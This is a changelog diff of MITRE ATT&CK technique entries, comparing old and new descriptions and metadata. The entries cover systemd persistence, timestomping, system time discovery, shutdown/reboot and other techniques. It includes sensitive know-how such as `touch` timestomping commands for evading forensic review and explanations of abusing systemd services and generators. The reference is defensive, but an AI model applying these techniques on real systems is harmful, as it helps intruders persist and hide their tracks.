| ttack.mitre.org/techniques/T1059/008) (e.g. <code>reload</co | | ttack.mitre.org/techniques/T1059/008) (e.g. <code>reload</co |
| de>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert | | de>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert |
| _TA18_106A) Shutting down or rebooting systems may disrupt | | _TA18_106A) They may also include shutdown/reboot of a virtu |
| access to computer resources for legitimate users while also | | al machine via hypervisor / cloud consoles or command line t |
| impeding incident response/recovery. Adversaries may attem | | ools. Shutting down or rebooting systems may disrupt access |
| pt to shutdown/reboot a system after impacting it in other w | | to computer resources for legitimate users while also imped |
| ays, such as [Disk Structure Wipe](https://attack.mitre.org/ | | ing incident response/recovery. Adversaries may attempt to |
| techniques/T1561/002) or [Inhibit System Recovery](https://a | | shutdown/reboot a system after impacting it in other ways, s |
| ttack.mitre.org/techniques/T1490), to hasten the intended ef | | uch as [Disk Structure Wipe](https://attack.mitre.org/techni |
| fects on system availability.(Citation: Talos Nyetya June 20 | | ques/T1561/002) or [Inhibit System Recovery](https://attack. |
| 17)(Citation: Talos Olympic Destroyer 2018) | | mitre.org/techniques/T1490), to hasten the intended effects |
| | | on system availability.(Citation: Talos Nyetya June 2017)(Ci |
| | | tation: Talos Olympic Destroyer 2018) |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 20:45:22.531000+00:00 | 2025-04-15 19:59:24.950000+00:00 |
description | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload ).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload ).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) They may also include shutdown/reboot of a virtual machine via hypervisor / cloud consoles or command line tools.
Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Janantha Marasinghe |
x_mitre_platforms | | ESXi |
[T1124] System Time Discovery
Current version: 1.5
Version changed from: 1.4 → 1.5
t | An adversary may gather the system time and/or time zone set | t | An adversary may gather the system time and/or time zone set |
| tings from a local or remote system. The system time is set | | tings from a local or remote system. The system time is set |
| and stored by services, such as the Windows Time Service on | | and stored by services, such as the Windows Time Service on |
| Windows or <code>systemsetup</code> on macOS.(Citation: MSDN | | Windows or <code>systemsetup</code> on macOS.(Citation: MSDN |
| System Time)(Citation: Technet Windows Time Service)(Citati | | System Time)(Citation: Technet Windows Time Service)(Citati |
| on: systemsetup mac time) These time settings may also be sy | | on: systemsetup mac time) These time settings may also be sy |
| nchronized between systems and services in an enterprise net | | nchronized between systems and services in an enterprise net |
| work, typically accomplished with a network time server with | | work, typically accomplished with a network time server with |
| in a domain.(Citation: Mac Time Sync)(Citation: linux system | | in a domain.(Citation: Mac Time Sync)(Citation: linux system |
| time) System time information may be gathered in a number | | time) System time information may be gathered in a number |
| of ways, such as with [Net](https://attack.mitre.org/softwar | | of ways, such as with [Net](https://attack.mitre.org/softwar |
| e/S0039) on Windows by performing <code>net time \\hostname< | | e/S0039) on Windows by performing <code>net time \\hostname< |
| /code> to gather the system time on a remote system. The vic | | /code> to gather the system time on a remote system. The vic |
| tim's time zone may also be inferred from the current system | | tim's time zone may also be inferred from the current system |
| time or gathered by using <code>w32tm /tz</code>.(Citation: | | time or gathered by using <code>w32tm /tz</code>.(Citation: |
| Technet Windows Time Service) In addition, adversaries can | | Technet Windows Time Service) In addition, adversaries can |
| discover device uptime through functions such as <code>GetTi | | discover device uptime through functions such as <code>GetTi |
| ckCount()</code> to determine how long it has been since the | | ckCount()</code> to determine how long it has been since the |
| system booted up.(Citation: Virtualization/Sandbox Evasion) | | system booted up.(Citation: Virtualization/Sandbox Evasion) |
| On network devices, [Network Device CLI](https://attack.mi | | On network devices, [Network Device CLI](https://attack.mi |
| tre.org/techniques/T1059/008) commands such as `show clock d | | tre.org/techniques/T1059/008) commands such as `show clock d |
| etail` can be used to see the current time configuration.(Ci | | etail` can be used to see the current time configuration.(Ci |
| tation: show_clock_detail_cisco_cmd) In addition, system ca | | tation: show_clock_detail_cisco_cmd) On ESXi servers, `esxcl |
| lls – such as <code>time()</code> – have been used to collec | | i system clock get` can be used for the same purpose. In ad |
| t the current time on Linux devices.(Citation: MAGNET GOBLIN | | dition, system calls – such as <code>time()</code> – have be |
| ) On macOS systems, adversaries may use commands such as <co | | en used to collect the current time on Linux devices.(Citati |
| de>systemsetup -gettimezone</code> or <code>timeIntervalSinc | | on: MAGNET GOBLIN) On macOS systems, adversaries may use com |
| eNow</code> to gather current time zone information or curre | | mands such as <code>systemsetup -gettimezone</code> or <code |
| nt date and time.(Citation: System Information Discovery Tec | | >timeIntervalSinceNow</code> to gather current time zone inf |
| hnique)(Citation: ESET DazzleSpy Jan 2022) This information | | ormation or current date and time.(Citation: System Informat |
| could be useful for performing other techniques, such as ex | | ion Discovery Technique)(Citation: ESET DazzleSpy Jan 2022) |
| ecuting a file with a [Scheduled Task/Job](https://attack.mi | | This information could be useful for performing other techn |
| tre.org/techniques/T1053)(Citation: RSA EU12 They're Inside) | | iques, such as executing a file with a [Scheduled Task/Job]( |
| , or to discover locality information based on time zone to | | https://attack.mitre.org/techniques/T1053)(Citation: RSA EU1 |
| assist in victim targeting (i.e. [System Location Discovery] | | 2 They're Inside), or to discover locality information based |
| (https://attack.mitre.org/techniques/T1614)). Adversaries ma | | on time zone to assist in victim targeting (i.e. [System Lo |
| y also use knowledge of system time as part of a time bomb, | | cation Discovery](https://attack.mitre.org/techniques/T1614) |
| or delaying execution until a specified date/time.(Citation: | | ). Adversaries may also use knowledge of system time as part |
| AnyRun TimeBomb) | | of a time bomb, or delaying execution until a specified dat |
| | | e/time.(Citation: AnyRun TimeBomb) |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:50:15.929000+00:00 | 2025-04-15 19:59:21.176000+00:00 |
description | An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz .(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)
In addition, system calls – such as time() – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) | An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz .(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) On ESXi servers, `esxcli system clock get` can be used for the same purpose.
In addition, system calls – such as time() – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[1] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1543.002] Create or Modify System Process: Systemd Service
Current version: 1.6
Version changed from: 1.5 → 1.6
t | Adversaries may create or modify systemd services to repeate | t | Adversaries may create or modify systemd services to repeate |
| dly execute malicious payloads as part of persistence. Syste | | dly execute malicious payloads as part of persistence. Syste |
| md is a system and service manager commonly used for managin | | md is a system and service manager commonly used for managin |
| g background daemon processes (also known as services) and o | | g background daemon processes (also known as services) and o |
| ther system resources.(Citation: Linux man-pages: systemd Ja | | ther system resources.(Citation: Linux man-pages: systemd Ja |
| nuary 2014) Systemd is the default initialization (init) sys | | nuary 2014) Systemd is the default initialization (init) sys |
| tem on many Linux distributions replacing legacy init system | | tem on many Linux distributions replacing legacy init system |
| s, including SysVinit and Upstart, while remaining backwards | | s, including SysVinit and Upstart, while remaining backwards |
| compatible. Systemd utilizes unit configuration files wi | | compatible. Systemd utilizes unit configuration files wi |
| th the `.service` file extension to encode information about | | th the `.service` file extension to encode information about |
| a service's process. By default, system level unit files ar | | a service's process. By default, system level unit files ar |
| e stored in the `/systemd/system` directory of the root owne | | e stored in the `/systemd/system` directory of the root owne |
| d directories (`/`). User level unit files are stored in the | | d directories (`/`). User level unit files are stored in the |
| `/systemd/user` directories of the user owned directories ( | | `/systemd/user` directories of the user owned directories ( |
| `$HOME`).(Citation: lambert systemd 2022) Inside the `.ser | | `$HOME`).(Citation: lambert systemd 2022) Inside the `.ser |
| vice` unit files, the following directives are used to execu | | vice` unit files, the following directives are used to execu |
| te commands:(Citation: freedesktop systemd.service) * `Ex | | te commands:(Citation: freedesktop systemd.service) * `Ex |
| ecStart`, `ExecStartPre`, and `ExecStartPost` directives exe | | ecStart`, `ExecStartPre`, and `ExecStartPost` directives exe |
| cute when a service is started manually by `systemctl` or on | | cute when a service is started manually by `systemctl` or on |
| system start if the service is set to automatically start. | | system start if the service is set to automatically start. |
| * `ExecReload` directive executes when a service restarts. | | * `ExecReload` directive executes when a service restarts. |
| * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives e | | * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives e |
| xecute when a service is stopped. Adversaries have create | | xecute when a service is stopped. Adversaries have create |
| d new service files, altered the commands a `.service` file’ | | d new service files, altered the commands a `.service` file’ |
| s directive executes, and modified the user directive a `.se | | s directive executes, and modified the user directive a `.se |
| rvice` file executes as, which could result in privilege esc | | rvice` file executes as, which could result in privilege esc |
| alation. Adversaries may also place symbolic links in these | | alation. Adversaries may also place symbolic links in these |
| directories, enabling systemd to find these payloads regardl | | directories, enabling systemd to find these payloads regardl |
| ess of where they reside on the filesystem.(Citation: Anomal | | ess of where they reside on the filesystem.(Citation: Anomal |
| i Rocke March 2019)(Citation: airwalk backdoor unix systems) | | i Rocke March 2019)(Citation: airwalk backdoor unix systems) |
| (Citation: Rapid7 Service Persistence 22JUNE2016) The .ser | | (Citation: Rapid7 Service Persistence 22JUNE2016) The `.se |
| vice file’s User directive can be used to run service as a s | | rvice` file’s User directive can be used to run service as a |
| pecific user, which could result in privilege escalation bas | | specific user, which could result in privilege escalation b |
| ed on specific user/group permissions. | | ased on specific user/group permissions. Systemd services |
| | | can be created via systemd generators, which support the dyn |
| | | amic generation of unit files. Systemd generators are small |
| | | executables that run during boot or configuration reloads to |
| | | dynamically create or modify systemd unit files by converti |
| | | ng non-native configurations into services, symlinks, or dro |
| | | p-ins (i.e., [Boot or Logon Initialization Scripts](https:// |
| | | attack.mitre.org/techniques/T1037)).(Citation: Elastic Secur |
| | | ity Labs Linux Persistence 2024)(Citation: Pepe Berba System |
| | | d 2022) |
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-15 14:19:22.282000+00:00 | 2025-04-15 19:59:14.487000+00:00 |
description | Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022)
Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.
Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)
The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. | Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022)
Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.
Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)
The `.service` file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.
Systemd services can be created via systemd generators, which support the dynamic generation of unit files. Systemd generators are small executables that run during boot or configuration reloads to dynamically create or modify systemd unit files by converting non-native configurations into services, symlinks, or drop-ins (i.e., [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037)).(Citation: Elastic Security Labs Linux Persistence 2024)(Citation: Pepe Berba Systemd 2022) |
x_mitre_version | 1.5 | 1.6 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Pepe Berba Systemd 2022', 'description': 'Pepe Berba. (2022, February 7). Hunting for Persistence in Linux (Part 5): Systemd Generators. Retrieved April 8, 2025.', 'url': 'https://pberba.github.io/security/2022/02/07/linux-threat-hunting-for-persistence-systemd-generators/'} |
external_references | | {'source_name': 'Elastic Security Labs Linux Persistence 2024', 'description': 'Ruben Groenewoud. (2024, August 20). Linux Detection Engineering - A primer on persistence mechanisms. Retrieved March 18, 2025.', 'url': 'https://www.elastic.co/security-labs/primer-on-persistence-mechanisms'} |
x_mitre_contributors | | Ruben Groenewoud (@RFGroenewoud) |
[T1053.006] Scheduled Task/Job: Systemd Timers
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'root'] | |
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:42:51.536000+00:00 | 2025-04-15 19:58:55.648000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1542.005] Pre-OS Boot: TFTP Boot
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-22 16:35:53.806000+00:00 | 2025-04-15 19:58:15.890000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1080] Taint Shared Content
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Access to shared folders and content with write permissions'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:07:36.903000+00:00 | 2025-04-15 19:58:14.334000+00:00 |
x_mitre_version | 1.5 | 1.6 |
[T1221] Template Injection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Static File Analysis'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-01-12 18:16:56.176000+00:00 | 2025-04-15 19:59:13.447000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1055.003] Process Injection: Thread Execution Hijacking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 12:22:50.800000+00:00 | 2025-04-15 19:58:26.012000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1055.005] Process Injection: Thread Local Storage
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 12:24:54.198000+00:00 | 2025-04-15 19:59:16.376000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host forensic analysis', 'Signature-based detection', 'Static File Analysis', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:50:18.048000+00:00 | 2025-04-15 19:58:29.032000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1547.003] Boot or Logon Autostart Execution: Time Providers
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-12 02:34:58.003000+00:00 | 2025-04-15 19:58:35.700000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1070.006] Indicator Removal: Timestomp
Current version: 1.2
Version changed from: 1.1 → 1.2
t | Adversaries may modify file time attributes to hide new file | t | Adversaries may modify file time attributes to hide new file |
| s or changes to existing files. Timestomping is a technique | | s or changes to existing files. Timestomping is a technique |
| that modifies the timestamps of a file (the modify, access, | | that modifies the timestamps of a file (the modify, access, |
| create, and change times), often to mimic files that are in | | create, and change times), often to mimic files that are in |
| the same folder and blend malicious files with legitimate fi | | the same folder and blend malicious files with legitimate fi |
| les. Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NA | | les. In Windows systems, both the `$STANDARD_INFORMATION` ( |
| ME` (`$FN`) attributes record times in a Master File Table ( | | `$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a |
| MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (da | | Master File Table (MFT) file.(Citation: Inversecos Timestom |
| tes/time stamps) is displayed to the end user, including in | | ping 2022) `$SI` (dates/time stamps) is displayed to the end |
| the File System view, while `$FN` is dealt with by the kerne | | user, including in the File System view, while `$FN` is dea |
| l.(Citation: Magnet Forensics) Modifying the `$SI` attribut | | lt with by the kernel.(Citation: Magnet Forensics) Modifyin |
| e is the most common method of timestomping because it can b | | g the `$SI` attribute is the most common method of timestomp |
| e modified at the user level using API calls. `$FN` timestom | | ing because it can be modified at the user level using API c |
| ping, however, typically requires interacting with the syste | | alls. `$FN` timestomping, however, typically requires intera |
| m kernel or moving or renaming a file.(Citation: Inversecos | | cting with the system kernel or moving or renaming a file.(C |
| Timestomping 2022) Adversaries modify timestamps on files s | | itation: Inversecos Timestomping 2022) Adversaries modify t |
| o that they do not appear conspicuous to forensic investigat | | imestamps on files so that they do not appear conspicuous to |
| ors or file analysis tools. In order to evade detections tha | | forensic investigators or file analysis tools. In order to |
| t rely on identifying discrepancies between the `$SI` and `$ | | evade detections that rely on identifying discrepancies betw |
| FN` attributes, adversaries may also engage in “double times | | een the `$SI` and `$FN` attributes, adversaries may also eng |
| tomping” by modifying times on both attributes simultaneousl | | age in “double timestomping” by modifying times on both attr |
| y.(Citation: Double Timestomping) Timestomping may be used | | ibutes simultaneously.(Citation: Double Timestomping) In Li |
| along with file name [Masquerading](https://attack.mitre.org | | nux systems and on ESXi servers, threat actors may attempt t |
| /techniques/T1036) to hide malware and tools.(Citation: Wind | | o perform timestomping using commands such as `touch -a -m - |
| owsIR Anti-Forensic Techniques) | | t <timestamp> <filename>` (which sets access and modificatio |
| | | n times to a specific value) or `touch -r <filename> <filena |
| | | me>` (which sets access and modification times to match thos |
| | | e of another file).(Citation: Inversecos Linux Timestomping) |
| | | (Citation: Juniper Networks ESXi Backdoor 2022) Timestompin |
| | | g may be used along with file name [Masquerading](https://at |
| | | tack.mitre.org/techniques/T1036) to hide malware and tools.( |
| | | Citation: WindowsIR Anti-Forensic Techniques) |
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host forensic analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-30 15:14:56.021000+00:00 | 2025-04-15 19:58:27.752000+00:00 |
description | Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques) | Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
In Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
In Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t <timestamp> <filename>` (which sets access and modification times to a specific value) or `touch -r <filename> <filename>` (which sets access and modification times to match those of another file).(Citation: Inversecos Linux Timestomping)(Citation: Juniper Networks ESXi Backdoor 2022)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques) |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Juniper Networks ESXi Backdoor 2022', 'description': 'Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025.', 'url': 'https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers'} |
external_references | | {'source_name': 'Inversecos Linux Timestomping', 'description': 'inversecos. (2022, August 4). Detecting Linux Anti-Forensics: Timestomping. Retrieved March 26, 2025.', 'url': 'https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html'} |
x_mitre_platforms | | ESXi |
[T1134.001] Access Token Manipulation: Token Impersonation/Theft
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Windows User Account Control', 'System access controls', 'File system access controls'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-10 17:57:36.177000+00:00 | 2025-04-15 19:58:48.792000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1020.001] Automated Exfiltration: Traffic Duplication
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:08:13.273000+00:00 | 2025-04-15 19:58:44.474000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[0] | Network | Network Devices |
[T1205] Traffic Signaling
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Defensive network service scanning'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-19 23:08:40.603000+00:00 | 2025-04-15 19:58:27.071000+00:00 |
external_references[3]['description'] | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.mandiant.com/resources/synful-knock-acis | https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.4 | 2.5 |
